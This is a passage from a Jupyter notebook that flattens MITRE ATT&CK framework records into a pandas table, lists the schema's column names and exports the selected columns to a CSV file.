'difficulty_for_adversary': None,\n", " 'difficulty_explanation': None,\n", " 'tactic_type': None}" ] }, "execution_count": 27, "metadata": {}, "output_type": "execute_result" } ], "source": [ "all_attack_framework[0]" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "Showing the schema of the results" ] }, { "cell_type": "code", "execution_count": 28, "metadata": {}, "outputs": [], 
"source": [ "df = json_normalize(all_attack_framework)" ] }, { "cell_type": "code", "execution_count": 29, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "['capec_id',\n", " 'capec_url',\n", " 'contributors',\n", " 'created',\n", " 'created_by_ref',\n", " 'data_sources',\n", " 'defense_bypassed',\n", " 'detectable_by_common_defenses',\n", " 'detectable_explanation',\n", " 'difficulty_explanation',\n", " 'difficulty_for_adversary',\n", " 'effective_permissions',\n", " 'group',\n", " 'group_aliases',\n", " 'group_description',\n", " 'group_id',\n", " 'group_references',\n", " 'id',\n", " 'matrix',\n", " 'mitigation',\n", " 'mitigation_description',\n", " 'mitigation_references',\n", " 'modified',\n", " 'network_requirements',\n", " 'object_marking_refs',\n", " 'permissions_required',\n", " 'platform',\n", " 'relationship',\n", " 'relationship_description',\n", " 'relationship_id',\n", " 'remote_support',\n", " 'software',\n", " 'software_aliases',\n", " 'software_description',\n", " 'software_id',\n", " 'software_labels',\n", " 'software_platform',\n", " 'software_references',\n", " 'software_url',\n", " 'system_requirements',\n", " 'tactic',\n", " 'tactic_type',\n", " 'target_object',\n", " 'technique',\n", " 'technique_description',\n", " 'technique_detection',\n", " 'technique_id',\n", " 'technique_references',\n", " 'type',\n", " 'url']" ] }, "execution_count": 29, "metadata": {}, "output_type": "execute_result" } ], "source": [ "list(df)" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### We can then export All ATT&CK as a CSV file" ] }, { "cell_type": "code", "execution_count": 30, "metadata": {}, "outputs": [], "source": [ "df = df[[\n", " 'matrix','tactic','technique','technique_id','capec_id','capec_url','technique_description','technique_detection',\n", " 'mitigation','mitigation_description','group','group_id','group_aliases','group_description','software',\n", " 
'software_id','software_description','software_labels','software_platform','relationship',\n", " 'relationship_description','platform','data_sources','detectable_by_common_defenses','detectable_explanation',\n", " 'difficulty_for_adversary','difficulty_explanation','effective_permissions','network_requirements',\n", " 'permissions_required','remote_support','system_requirements','contributors','url','technique_references',\n", " 'group_references','software_references']]" ] }, { "cell_type": "code", "execution_count": 31, "metadata": {}, "outputs": [], "source": [ "df.to_csv('all_attack.csv',index=False,encoding='utf-8')" ] }, { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [] } ], "metadata": { "kernelspec": { "display_name": "Python 3", "language": "python", "name": "python3" }, "language_info": { "codemirror_mode": { "name": "ipython", "version": 3 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", "pygments_lexer": "ipython3", "version": "3.6.5" } }, "nbformat": 4, "nbformat_minor": 2 }